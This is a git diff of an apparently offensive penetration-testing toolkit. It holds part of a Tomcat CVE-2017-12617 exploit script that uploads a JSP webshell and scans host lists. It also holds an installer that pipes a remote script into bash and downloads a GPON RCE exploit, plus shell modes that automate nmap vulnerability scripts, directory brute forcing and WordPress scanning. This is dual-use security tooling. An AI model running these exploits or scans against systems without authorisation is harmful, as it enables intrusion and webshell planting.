print bcolors.OKGREEN+banner+bcolors.ENDC
|
||||
url=str(opt.U)
|
||||
checker="Poc.jsp"
|
||||
print bcolors.BOLD +"Poc Filename {}".format(checker)
|
||||
createPayload(str(url)+"/",checker)
|
||||
con=getContent(str(url)+"/",checker)
|
||||
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
|
||||
print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC
|
||||
print bcolors.WARNING+url+"/"+checker+bcolors.ENDC
|
||||
|
||||
else:
|
||||
print 'Not Vulnerable to CVE-2017-12617 '
|
||||
elif opt.P!=None and opt.U!=None and opt.L==None:
|
||||
print bcolors.OKGREEN+banner+bcolors.ENDC
|
||||
pwn=str(opt.P)
|
||||
url=str(opt.U)
|
||||
print "Uploading Webshell ....."
|
||||
pwn=pwn+".jsp"
|
||||
RCE(str(url)+"/",pwn)
|
||||
shell(str(url),pwn)
|
||||
elif opt.L!=None and opt.P==None and opt.U==None:
|
||||
print bcolors.OKGREEN+banner+bcolors.ENDC
|
||||
w=str(opt.L)
|
||||
f=open(w,"r")
|
||||
print "Scaning hosts in {}".format(w)
|
||||
checker="Poc.jsp"
|
||||
for i in f.readlines():
|
||||
i=i.strip("\n")
|
||||
createPayload(str(i)+"/",checker)
|
||||
con=getContent(str(i)+"/",checker)
|
||||
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
|
||||
print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m"
|
||||
|
||||
|
|
@ -0,0 +1,47 @@
|
|||
import requests
|
||||
import re
|
||||
import sys
|
||||
from multiprocessing.dummy import Pool
|
||||
|
||||
|
||||
def robots(host):
|
||||
r = requests.get(
|
||||
'https://web.archive.org/cdx/search/cdx\
|
||||
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
|
||||
results = r.json()
|
||||
if len(results) == 0: # might find nothing
|
||||
return []
|
||||
results.pop(0) # The first item is ['timestamp', 'original']
|
||||
return results
|
||||
|
||||
|
||||
def getpaths(snapshot):
|
||||
url = 'https://web.archive.org/web/{0}/{1}'.format(snapshot[0], snapshot[1])
|
||||
robotstext = requests.get(url).text
|
||||
if 'Disallow:' in robotstext: # verify it's acually a robots.txt file, not 404 page
|
||||
paths = re.findall('/.*', robotstext)
|
||||
return paths
|
||||
return []
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
if len(sys.argv) < 2:
|
||||
print('Usage:\n\tpython3 waybackrobots.py <domain-name>')
|
||||
sys.exit()
|
||||
|
||||
host = sys.argv[1]
|
||||
|
||||
snapshots = robots(host)
|
||||
print('Found %s unique results' % len(snapshots))
|
||||
if len(snapshots) == 0:
|
||||
sys.exit()
|
||||
print('This may take some time...')
|
||||
pool = Pool(4)
|
||||
paths = pool.map(getpaths, snapshots)
|
||||
unique_paths = set()
|
||||
for i in paths:
|
||||
unique_paths.update(i)
|
||||
filename = '%s-robots.txt' % host
|
||||
with open(filename, 'w') as f:
|
||||
f.write('\n'.join(unique_paths))
|
||||
print('[*] Saved results to %s' % filename)
|
||||
|
|
@ -0,0 +1,35 @@
|
|||
import requests
|
||||
import sys
|
||||
import json
|
||||
|
||||
|
||||
def waybackurls(host, with_subs):
|
||||
if with_subs:
|
||||
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
|
||||
else:
|
||||
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
|
||||
r = requests.get(url)
|
||||
results = r.json()
|
||||
return results[1:]
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
argc = len(sys.argv)
|
||||
if argc < 2:
|
||||
print('Usage:\n\tpython3 waybackurls.py <url> <include_subdomains:optional>')
|
||||
sys.exit()
|
||||
|
||||
host = sys.argv[1]
|
||||
with_subs = False
|
||||
if argc > 3:
|
||||
with_subs = True
|
||||
|
||||
urls = waybackurls(host, with_subs)
|
||||
json_urls = json.dumps(urls)
|
||||
if urls:
|
||||
filename = '%s-waybackurls.json' % host
|
||||
with open(filename, 'w') as f:
|
||||
f.write(json_urls)
|
||||
print('[*] Saved results to %s' % filename)
|
||||
else:
|
||||
print('[-] Found nothing')
|
||||
53
install.sh
53
install.sh
|
|
@ -23,7 +23,7 @@ LOOT_DIR=/usr/share/sniper/loot
|
|||
PLUGINS_DIR=/usr/share/sniper/plugins
|
||||
GO_DIR=~/go/bin
|
||||
|
||||
echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
|
||||
echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue? (Hit Ctrl+C to exit)$RESET"
|
||||
read answer
|
||||
|
||||
mkdir -p $INSTALL_DIR 2> /dev/null
|
||||
|
|
@ -38,16 +38,16 @@ cp -Rf * $INSTALL_DIR 2> /dev/null
|
|||
cd $INSTALL_DIR
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
|
||||
apt-get install python3-uritools python3-paramiko nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang adb xsltproc
|
||||
apt-get install waffit 2> /dev/null
|
||||
apt-get install libssl-dev 2> /dev/null
|
||||
apt-get remove python3-pip
|
||||
apt-get install python3-pip
|
||||
apt-get update
|
||||
apt-get install -y python3-uritools python3-paramiko nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix sslyze arachni aha libxml2-utils rpcbind cutycapt host whois dnsrecon curl nmap php php-curl hydra wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang adb xsltproc
|
||||
apt-get install -y waffit 2> /dev/null
|
||||
apt-get install -y libssl-dev 2> /dev/null
|
||||
apt-get remove -y python3-pip
|
||||
apt-get install -y python3-pip
|
||||
pip install dnspython colorama tldextract urllib3 ipaddress requests
|
||||
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
|
||||
gem install aquatone
|
||||
gem install rake
|
||||
gem install ruby-nmap net-http-persistent mechanize text-table
|
||||
gem install public_suffix
|
||||
|
|
@ -63,12 +63,8 @@ mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
|
|||
mkdir -p $GO_DIR 2> /dev/null
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
|
||||
git clone https://github.com/1N3/Findsploit.git
|
||||
git clone https://github.com/1N3/BruteX.git
|
||||
git clone https://github.com/1N3/Goohak.git
|
||||
git clone https://github.com/1N3/XSSTracer.git
|
||||
git clone https://github.com/1N3/MassBleed.git
|
||||
git clone https://github.com/1N3/SuperMicro-Password-Scanner
|
||||
git clone https://github.com/1N3/BlackWidow
|
||||
cp /usr/share/sniper/plugins/BlackWidow/blackwidow /usr/bin/blackwidow
|
||||
cp /usr/share/sniper/plugins/BlackWidow/injectx.py /usr/bin/injectx.py
|
||||
|
|
@ -85,9 +81,6 @@ git clone https://github.com/jekyc/wig.git
|
|||
git clone https://github.com/rbsec/dnscan.git
|
||||
git clone https://github.com/nmap/nmap.git
|
||||
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
|
||||
git clone https://github.com/1N3/CVE-2018-15473-Exploit.git ssh-enum
|
||||
git clone https://github.com/leapsecurity/libssh-scanner.git
|
||||
pip install -r $PLUGINS_DIR/libssh-scanner/requirements.txt
|
||||
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
|
||||
unzip slurp.zip
|
||||
rm -f slurp.zip
|
||||
|
|
@ -95,15 +88,13 @@ cd ~/go/bin/;go get -u github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/
|
|||
cd ~/go/bin;go get -u github.com/OWASP/Amass/cmd/amass; mv amass /usr/local/bin/
|
||||
cd ~/go/bin;go get -u github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
|
||||
cd $PLUGINS_DIR
|
||||
wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d496c730934965/scripts/http-vuln-INTEL-SA-00075.nse -O /usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse
|
||||
wget https://raw.githubusercontent.com/f3d0x0/GPON/master/gpon_rce.py -O /usr/share/sniper/bin/gpon_rce.py
|
||||
cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse 2> /dev/null
|
||||
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
|
||||
cd $PLUGINS_DIR/Findsploit/ && bash install.sh
|
||||
cd $PLUGINS_DIR/BruteX/ && bash install.sh
|
||||
cd $PLUGINS_DIR/spoofcheck/ && pip install -r requirements.txt
|
||||
mv ~/.sniper.conf ~/.sniper.conf.old 2> /dev/null
|
||||
cp $INSTALL_DIR/sniper.conf ~/.sniper.conf 2> /dev/null
|
||||
cd $PLUGINS_DIR/BruteX/ && bash install.sh 2> /dev/null
|
||||
cd $PLUGINS_DIR/spoofcheck/ && pip install -r requirements.txt 2> /dev/null
|
||||
cd $PLUGINS_DIR/CMSmap/ && pip3 install . && python3 setup.py install
|
||||
cd $PLUGINS_DIR/nmap/ && ./configure && make && make install
|
||||
#cd $PLUGINS_DIR/nmap/ && ./configure && make && make install
|
||||
cd $INSTALL_DIR
|
||||
mkdir $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
|
||||
|
|
@ -111,33 +102,13 @@ mkdir $LOOT_DIR/nmap -p 2> /dev/null
|
|||
mkdir $LOOT_DIR/domains -p 2> /dev/null
|
||||
mkdir $LOOT_DIR/output -p 2> /dev/null
|
||||
mkdir $LOOT_DIR/reports -p 2> /dev/null
|
||||
cp -f $INSTALL_DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
|
||||
chmod +x $INSTALL_DIR/sniper
|
||||
chmod +x $INSTALL_DIR/bin/dnsdict6
|
||||
chmod +x $PLUGINS_DIR/Goohak/goohak
|
||||
chmod +x $PLUGINS_DIR/XSSTracer/xsstracer.py
|
||||
chmod +x $PLUGINS_DIR/MassBleed/massbleed
|
||||
chmod +x $PLUGINS_DIR/MassBleed/heartbleed.py
|
||||
chmod +x $PLUGINS_DIR/MassBleed/openssl_ccs.pl
|
||||
chmod +x $PLUGINS_DIR/MassBleed/winshock.sh
|
||||
chmod +x $PLUGINS_DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
|
||||
chmod +x $PLUGINS_DIR/testssl.sh/testssl.sh
|
||||
rm -f /usr/bin/sniper
|
||||
rm -f /usr/bin/goohak
|
||||
rm -f /usr/bin/xsstracer
|
||||
rm -f /usr/bin/findsploit
|
||||
rm -f /usr/bin/copysploit
|
||||
rm -f /usr/bin/compilesploit
|
||||
rm -f /usr/bin/massbleed
|
||||
rm -f /usr/bin/dirsearch
|
||||
ln -s $INSTALL_DIR/sniper /usr/bin/sniper
|
||||
ln -s $PLUGINS_DIR/Goohak/goohak /usr/bin/goohak
|
||||
ln -s $PLUGINS_DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
|
||||
ln -s $PLUGINS_DIR/Findsploit/findsploit /usr/bin/findsploit
|
||||
ln -s $PLUGINS_DIR/Findsploit/copysploit /usr/bin/copysploit
|
||||
ln -s $PLUGINS_DIR/Findsploit/compilesploit /usr/bin/compilesploit
|
||||
ln -s $PLUGINS_DIR/MassBleed/massbleed /usr/bin/massbleed
|
||||
ln -s $PLUGINS_DIR/testssl.sh/testssl.sh /usr/bin/testssl
|
||||
ln -s $PLUGINS_DIR/dirsearch/dirsearch.py /usr/bin/dirsearch
|
||||
msfdb init
|
||||
echo -e "$OKORANGE + -- --=[Done!$RESET"
|
||||
|
|
|
|||
|
|
@ -7,7 +7,6 @@ if [ "$MODE" = "discover" ]; then
|
|||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/ips 2> /dev/null
|
||||
mkdir $LOOT_DIR/ips 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
mkdir $LOOT_DIR/nmap 2> /dev/null
|
||||
mkdir $LOOT_DIR/notes 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -73,13 +73,15 @@ if [ "$MODE" = "flyover" ]; then
|
|||
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
|
||||
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=10000 2> /dev/null &
|
||||
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=10000 2> /dev/null &
|
||||
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
|
||||
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
|
||||
else
|
||||
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=10000 2> /dev/null &
|
||||
cutycapt --url=https://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=10000 2> /dev/null &
|
||||
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
|
||||
cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
|
||||
fi
|
||||
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
|
||||
i=$((i+1))
|
||||
if [ "$i" -gt "20" ]; then
|
||||
i=0
|
||||
|
|
@ -112,6 +114,7 @@ if [ "$MODE" = "flyover" ]; then
|
|||
echo -n "$PORT "
|
||||
done
|
||||
echo ""
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
done
|
||||
fi
|
||||
exit
|
||||
|
|
|
|||
|
|
@ -26,26 +26,35 @@ if [ "$MODE" = "fullportonly" ]; then
|
|||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
if [ -z "$PORT" ]; then
|
||||
#nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
nmap -vv -sT -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -sU -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
|
||||
nmap -Pn -sU -sV -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -A -v -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
nmap -Pn -A -v -sV -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -A -v -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml >> $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DONE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -7,10 +7,14 @@ else
|
|||
echo -e "$OKRED RUNNING FULL PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
#nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
nmap -vv -sT -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -sU -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
|
||||
nmap -Pn -sU -sV -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
fi
|
||||
1346
modes/normal.sh
1346
modes/normal.sh
File diff suppressed because it is too large
Load Diff
|
|
@ -1,136 +1,250 @@
|
|||
if [ "$MODE" = "web" ];
|
||||
then
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
if [ "$MODE" = "web" ]; then
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}\"$RESET"
|
||||
fi
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}"
|
||||
echo ""
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET -l 3 -s y -v y
|
||||
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
blackwidow -u http://$TARGET:80 -l 3 -s y -v n
|
||||
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url http://$TARGET --disable-tls-checks
|
||||
echo ""
|
||||
wpscan --url http://$TARGET/wordpress/ --disable-tls-checks
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap http://$TARGET
|
||||
echo ""
|
||||
cmsmap http://$TARGET/wordpress/
|
||||
echo ""
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null
|
||||
fi
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
